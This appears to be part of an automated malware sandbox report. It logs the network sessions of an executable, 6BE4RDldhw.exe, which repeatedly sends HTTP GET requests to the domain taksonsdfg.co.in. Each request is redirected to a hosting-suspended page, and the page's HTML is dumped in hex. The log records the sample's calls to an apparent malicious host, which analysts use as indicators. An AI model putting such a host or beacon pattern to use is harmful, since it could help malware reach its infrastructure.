6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49883	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:12 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:13 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:12 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:13 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49889	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:14 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:15 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:14 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:15 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:15 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49896	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:16 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:17 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:17 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:17 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49901	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:18 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:19 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:19 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:19 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:19 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49908	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:21 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:21 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:21 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:21 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49912	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:22 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:23 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:23 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:23 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:23 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49919	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:25 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:25 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:25 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:25 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49925	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:27 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:27 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:27 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:27 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" conte
2024-11-26 07:13:27 UTC	6588	IN	Data Raw: 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 39 33 41 34 41 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 31 39 33 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 Data Ascii: background-repeat: no-repeat; background-color: #293A4A; color: #FFFFFF; } .additional-info-items { padding: 20px; min-height: 193px; } .info-heading { font
2024-11-26 07:13:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49931	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:29 UTC	194	OUT	GET /2345678765432123456789876543/243_Yjnxmyasmza HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:29 UTC	446	IN	HTTP/1.1 302 Found Connection: close content-type: text/html content-length: 771 date: Tue, 26 Nov 2024 07:13:29 GMT server: LiteSpeed cache-control: no-cache, no-store, must-revalidate, max-age=0 location: https://taksonsdfg.co.in/cgi-sys/suspendedpage.cgi alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:29 UTC	771	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 32 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 302 Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style><

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.7	49936	108.170.55.202	443	7796	C:\Users\user\Desktop\6BE4RDldhw.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-26 07:13:31 UTC	175	OUT	GET /cgi-sys/suspendedpage.cgi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: taksonsdfg.co.in
2024-11-26 07:13:32 UTC	325	IN	HTTP/1.1 200 OK Connection: close content-type: text/html transfer-encoding: chunked date: Tue, 26 Nov 2024 07:13:32 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-11-26 07:13:32 UTC	1043	IN	Data Raw: 31 64 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 Data Ascii: 1dc7<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta 